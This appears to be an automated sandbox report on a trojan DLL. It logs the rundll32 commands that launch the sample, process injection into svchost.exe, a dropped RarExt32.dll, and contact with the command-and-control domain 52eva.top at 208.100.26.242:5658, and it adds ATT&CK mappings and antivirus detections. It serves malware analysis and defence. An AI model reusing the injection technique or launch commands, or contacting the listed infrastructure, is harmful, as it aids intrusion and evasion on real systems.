Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3144 -s 616
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 844
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\5iiXyNVCQ3.dll",#1Jump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\5iiXyNVCQ3.dll,unllJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\WINDOWS\system32\svchost.exe -K NetworkServiceJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\5iiXyNVCQ3.dll",#1Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\WINDOWS\system32\svchost.exe -K NetworkServiceJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\WINDOWS\system32\svchost.exe -K NetworkServiceJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER806D.tmpJump to behavior
Source: classification engineClassification label: mal100.evad.winDLL@16/9@1/2
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10007FFC CreateToolhelp32Snapshot,CloseHandle,0_2_10007FFC
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\5iiXyNVCQ3.dll,unll
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:676:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess964
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3144
Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\USERNAME
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00484376 __EH_prolog,FindResourceA,LoadResource,LockResource,IsWindowEnabled,EnableWindow,EnableWindow,GetActiveWindow,SetActiveWindow,7_2_00484376
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Program Files\WinRAPJump to behavior
Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\svchost.exeAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\rundll32.exeDirectory created: C:\Program Files\WinRAPJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeDirectory created: C:\Program Files\WinRAP\RarExt32.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1000C650 push eax; ret 0_2_1000C67E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1000C650 push eax; ret 3_2_1000C67E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1000C650 push eax; ret 4_2_1000C67E
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00492584 pushad ; ret 7_2_00492585
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00473304 push eax; ret 7_2_00473322
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00471390 push eax; ret 7_2_004713BE
Source: 5iiXyNVCQ3.dllStatic PE information: section name: .nsp0
Source: 5iiXyNVCQ3.dllStatic PE information: section name: .nsp1
Source: 5iiXyNVCQ3.dllStatic PE information: section name: .nsp2
Source: RarExt32.dll.3.drStatic PE information: section name: .nsp0
Source: RarExt32.dll.3.drStatic PE information: section name: .nsp1
Source: RarExt32.dll.3.drStatic PE information: section name: .nsp2
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004181F0 LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,FreeLibrary,FreeLibrary,LoadTypeLib,LoadTypeLib,RegisterTypeLib,748D7540,UnRegisterTypeLib,7_2_004181F0
Source: initial sampleStatic PE information: section where entry point is pointing to: .nsp1
Source: initial sampleStatic PE information: section name: .nsp1 entropy: 7.998366920306635
Source: initial sampleStatic PE information: section name: .nsp1 entropy: 7.998366920306635
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Program Files\WinRAP\RarExt32.dllJump to dropped file
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00416460 IsWindow,IsIconic,SetActiveWindow,IsWindow,IsWindow,DestroyAcceleratorTable,DestroyMenu,DestroyAcceleratorTable,DestroyMenu,DestroyAcceleratorTable,DestroyMenu,SetParent,SetWindowPos,IsWindow,SendMessageA,SendMessageA,DestroyAcceleratorTable,IsWindow,IsWindow,IsWindow,IsWindow,IsWindow,GetParent,GetFocus,IsWindow,SendMessageA,IsWindow,GetFocus,SetFocus,7_2_00416460
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0041EDD0 IsIconic,IsZoomed,LoadLibraryA,GetProcAddress,GetProcAddress,FreeLibrary,SystemParametersInfoA,IsWindow,ShowWindow,7_2_0041EDD0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0046F977 MonitorFromWindow,IsIconic,GetWindowPlacement,GetWindowRect,7_2_0046F977
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files\WinRAP\RarExt32.dllJump to dropped file
Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 4.5 %
Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00483CEE __EH_prolog,GetFullPathNameA,lstrcpyn,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpy,7_2_00483CEE
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0041EED0 FindFirstFileA,FindClose,7_2_0041EED0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040F300 FindFirstFileA,SendMessageA,SendMessageA,FindNextFileA,FindClose,SendMessageA,7_2_0040F300
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00417FF0 FindNextFileA,FindClose,FindFirstFileA,FindClose,7_2_00417FF0
Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\System32\loaddll32.exeAPI call chain: ExitProcess graph end nodegraph_0-6349
Source: C:\Windows\System32\loaddll32.exeAPI call chain: ExitProcess graph end nodegraph_0-6093
Source: C:\Windows\System32\loaddll32.exeAPI call chain: ExitProcess graph end nodegraph_0-6103
Source: C:\Windows\System32\loaddll32.exeAPI call chain: ExitProcess graph end nodegraph_0-6411
Source: C:\Windows\System32\loaddll32.exeAPI call chain: ExitProcess graph end nodegraph_0-7272
Source: C:\Windows\System32\loaddll32.exeAPI call chain: ExitProcess graph end nodegraph_0-6672
Source: C:\Windows\System32\loaddll32.exeAPI call chain: ExitProcess graph end nodegraph_0-6225
Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_3-6724
Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_3-7259
Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_3-6157
Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_3-6462
Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_3-6399
Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_3-6147
Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_3-6358
Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_4-6148
Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_4-7259
Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_4-6463
Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_4-6725
Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_4-6359
Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_4-6400
Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end nodegraph_7-58232
Source: rundll32.exe, 00000003.00000000.328082991.0000000000EEA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004181F0 LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,FreeLibrary,FreeLibrary,LoadTypeLib,LoadTypeLib,RegisterTypeLib,748D7540,UnRegisterTypeLib,7_2_004181F0
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10009430 GetProcessHeap,RtlAllocateHeap,MessageBoxA,0_2_10009430
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100017B4 mov esi, dword ptr fs:[00000030h]0_2_100017B4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100017B4 mov esi, dword ptr fs:[00000030h]3_2_100017B4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_100017B4 mov esi, dword ptr fs:[00000030h]4_2_100017B4
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0047C0DA SetUnhandledExceptionFilter,7_2_0047C0DA
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0047C0EC SetUnhandledExceptionFilter,7_2_0047C0EC

HIPS / PFW / Operating System Protection Evasion

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 208.100.26.242 5658Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exeDomain query: 52eva.top
Writes to foreign memory regions
Source: C:\Windows\System32\loaddll32.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 400000Jump to behavior
Source: C:\Windows\System32\loaddll32.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 401000Jump to behavior
Source: C:\Windows\System32\loaddll32.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4F9000Jump to behavior
Source: C:\Windows\System32\loaddll32.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 554000Jump to behavior
Source: C:\Windows\System32\loaddll32.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 82B008Jump to behavior
Allocates memory in foreign processes
Source: C:\Windows\System32\loaddll32.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 400000 protect: page read and writeJump to behavior
Injects a PE file into a foreign processes
Source: C:\Windows\System32\loaddll32.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 400000 value starts with: 4D5AJump to behavior
Contains functionality to inject code into remote processes
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10003356 LocalSize,RtlMoveMemory,LocalSize,RtlMoveMemory,LocalSize,CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,LocalSize,LocalSize,RtlMoveMemory,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,SetThreadContext,ResumeThread,WaitForSingleObject,CloseHandle,CloseHandle,0_2_10003356
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\WINDOWS\system32\svchost.exe -K NetworkServiceJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\5iiXyNVCQ3.dll",#1Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\WINDOWS\system32\svchost.exe -K NetworkServiceJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\WINDOWS\system32\svchost.exe -K NetworkServiceJump to behavior
Source: C:\Windows\SysWOW64\svchost.exeCode function: GetKeyboardLayout,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetSystemDefaultLangID,VerLanguageNameA,GetTimeZoneInformation,wsprintfA,7_2_0046D210
Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,IsValidCodePage,IsValidLocale,7_2_0047E607
Source: C:\Windows\SysWOW64\svchost.exeCode function: EnumSystemLocalesA,7_2_0047E7DC
Source: C:\Windows\SysWOW64\svchost.exeCode function: EnumSystemLocalesA,7_2_0047EA67
Source: C:\Windows\SysWOW64\svchost.exeCode function: EnumSystemLocalesA,7_2_0047EB7A
Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,7_2_0047ED6E
Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar,7_2_0047FB7A
Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,MultiByteToWideChar,7_2_0047FC37
Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,7_2_0047FC8D
Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,WideCharToMultiByte,7_2_0047FD50
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00472C10 GetLocalTime,GetSystemTime,GetTimeZoneInformation,7_2_00472C10
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0046D210 GetKeyboardLayout,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetSystemDefaultLangID,VerLanguageNameA,GetTimeZoneInformation,wsprintfA,7_2_0046D210
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0048D74C GetVersion,GetProcessVersion,LoadCursorA,LoadCursorA,LoadCursorA,7_2_0048D74C
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004688C0 GetUserNameA,GetWindowsDirectoryA,GetSystemDirectoryA,7_2_004688C0

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1
Native API		Path Interception511
Process Injection		1
Deobfuscate/Decode Files or Information		1
Input Capture		2
System Time Discovery		Remote Services1
Archive Collected Data		Exfiltration Over Other Network Medium1
Ingress Tool Transfer		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts4
Obfuscated Files or Information		LSASS Memory1
Account Discovery		Remote Desktop Protocol1
Input Capture		Exfiltration Over Bluetooth1
Encrypted Channel		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)3
Software Packing		Security Account Manager1
File and Directory Discovery		SMB/Windows Admin Shares2
Clipboard Data		Automated Exfiltration1
Non-Standard Port		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)2
Masquerading		NTDS13
System Information Discovery		Distributed Component Object ModelInput CaptureScheduled Transfer1
Non-Application Layer Protocol		SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
Virtualization/Sandbox Evasion		LSA Secrets111
Security Software Discovery		SSHKeyloggingData Transfer Size Limits1
Application Layer Protocol		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.common511
Process Injection		Cached Domain Credentials1
Virtualization/Sandbox Evasion		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup Items1
Rundll32		DCSync2
Process Discovery		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
Application Window Discovery		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
System Owner/User Discovery		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
Remote System Discovery		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 736960 Sample: 5iiXyNVCQ3 Startdate: 03/11/2022 Architecture: WINDOWS Score: 100 37 Snort IDS alert for network traffic 2->37 39 Multi AV Scanner detection for domain / URL 2->39 41 Malicious sample detected (through community Yara rule) 2->41 43 6 other signatures 2->43 8 loaddll32.exe 1 2->8         started        process3 signatures4 45 Contains functionality to inject code into remote processes 8->45 47 Writes to foreign memory regions 8->47 49 Allocates memory in foreign processes 8->49 51 Injects a PE file into a foreign processes 8->51 11 svchost.exe 8->11         started        15 cmd.exe 1 8->15         started        17 rundll32.exe 3 8->17         started        20 2 other processes 8->20 process5 dnsIp6 33 52eva.top 208.100.26.242, 49695, 5658 STEADFASTUS United States 11->33 53 System process connects to network (likely due to code injection or exploit) 11->53 22 rundll32.exe 15->22         started        31 C:\Program Files\WinRAP\RarExt32.dll, PE32 17->31 dropped 24 WerFault.exe 19 9 17->24         started        26 svchost.exe 17->26         started        35 192.168.2.1 unknown unknown 20->35 file7 signatures8 process9 process10 28 svchost.exe 22->28         started        signatures11 55 System process connects to network (likely due to code injection or exploit) 28->55

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
5iiXyNVCQ3.dll93%VirustotalBrowse
5iiXyNVCQ3.dll95%ReversingLabsWin32.Trojan.Qqblack
5iiXyNVCQ3.dll80%MetadefenderBrowse
5iiXyNVCQ3.dll100%AviraHEUR/AGEN.1238485
5iiXyNVCQ3.dll100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Program Files\WinRAP\RarExt32.dll100%AviraHEUR/AGEN.1238485
C:\Program Files\WinRAP\RarExt32.dll100%Joe Sandbox ML
C:\Program Files\WinRAP\RarExt32.dll95%ReversingLabsWin32.Trojan.Qqblack
C:\Program Files\WinRAP\RarExt32.dll93%VirustotalBrowse
C:\Program Files\WinRAP\RarExt32.dll80%MetadefenderBrowse

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
0.0.loaddll32.exe.bd4498.0.unpack100%AviraTR/Crypt.NSPM.GenDownload File
0.0.loaddll32.exe.280e2dd.4.unpack100%AviraTR/Crypt.NSPM.GenDownload File
3.0.rundll32.exe.1000e2dd.2.unpack100%AviraTR/Crypt.NSPM.GenDownload File
3.0.rundll32.exe.475e2dd.1.unpack100%AviraTR/Crypt.NSPM.GenDownload File
7.3.svchost.exe.e56000.1.unpack100%AviraTR/Patched.Ren.GenDownload File
0.3.loaddll32.exe.280e2dd.0.unpack100%AviraTR/Crypt.NSPM.GenDownload File
0.0.loaddll32.exe.1000e2dd.2.unpack100%AviraTR/Crypt.NSPM.GenDownload File
0.2.loaddll32.exe.280e2dd.1.unpack100%AviraTR/Crypt.NSPM.GenDownload File
3.0.rundll32.exe.475e2dd.4.unpack100%AviraTR/Crypt.NSPM.GenDownload File
4.2.rundll32.exe.1000e2dd.1.unpack100%AviraTR/Crypt.NSPM.GenDownload File
3.2.rundll32.exe.f1fe88.0.unpack100%AviraTR/Crypt.NSPM.GenDownload File
3.2.rundll32.exe.475e2dd.1.unpack100%AviraTR/Crypt.NSPM.GenDownload File
3.3.rundll32.exe.475e2dd.0.unpack100%AviraTR/Crypt.NSPM.GenDownload File
4.3.rundll32.exe.68ffa0.2.unpack100%AviraTR/Patched.Ren.GenDownload File
7.3.svchost.exe.eab008.0.unpack100%AviraTR/Crypt.NSPM.GenDownload File
4.3.rundll32.exe.aee2dd.0.unpack100%AviraTR/Crypt.NSPM.GenDownload File
3.0.rundll32.exe.1000e2dd.5.unpack100%AviraTR/Crypt.NSPM.GenDownload File
3.0.rundll32.exe.f1fe88.3.unpack100%AviraTR/Crypt.NSPM.GenDownload File
0.0.loaddll32.exe.1000e2dd.5.unpack100%AviraTR/Crypt.NSPM.GenDownload File
3.0.rundll32.exe.f1fe88.0.unpack100%AviraTR/Crypt.NSPM.GenDownload File
7.2.svchost.exe.400000.0.unpack100%AviraHEUR/AGEN.1225179Download File
0.0.loaddll32.exe.bd4498.3.unpack100%AviraTR/Crypt.NSPM.GenDownload File
0.2.loaddll32.exe.1000e2dd.2.unpack100%AviraTR/Crypt.NSPM.GenDownload File
4.2.rundll32.exe.aee2dd.0.unpack100%AviraTR/Crypt.NSPM.GenDownload File
3.2.rundll32.exe.1000e2dd.2.unpack100%AviraTR/Crypt.NSPM.GenDownload File
0.0.loaddll32.exe.280e2dd.1.unpack100%AviraTR/Crypt.NSPM.GenDownload File
4.3.rundll32.exe.68ffa0.1.unpack100%AviraTR/Patched.Ren.GenDownload File
0.2.loaddll32.exe.bd4498.0.unpack100%AviraTR/Crypt.NSPM.GenDownload File

Domains

SourceDetectionScannerLabelLink
52eva.top7%VirustotalBrowse

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
52eva.top
208.100.26.242
truetrueunknown

World Map of Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Public IPs

IPDomainCountryFlagASNASN NameMalicious
208.100.26.242
52eva.topUnited States
32748STEADFASTUStrue

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:36.0.0 Rainbow Opal
Analysis ID:736960
Start date and time:2022-11-03 12:34:10 +01:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 11m 13s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:5iiXyNVCQ3 (renamed file extension from none to dll)
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:18
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.evad.winDLL@16/9@1/2
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 24.3% (good quality ratio 23.4%)
  • Quality average: 81.5%
  • Quality standard deviation: 25.2%
HCA Information:
  • Successful, ratio: 99%
  • Number of executed functions: 103
  • Number of non-executed functions: 165
Cookbook Comments:
  • Override analysis time to 240s for rundll32

Warnings

  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WerFault.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
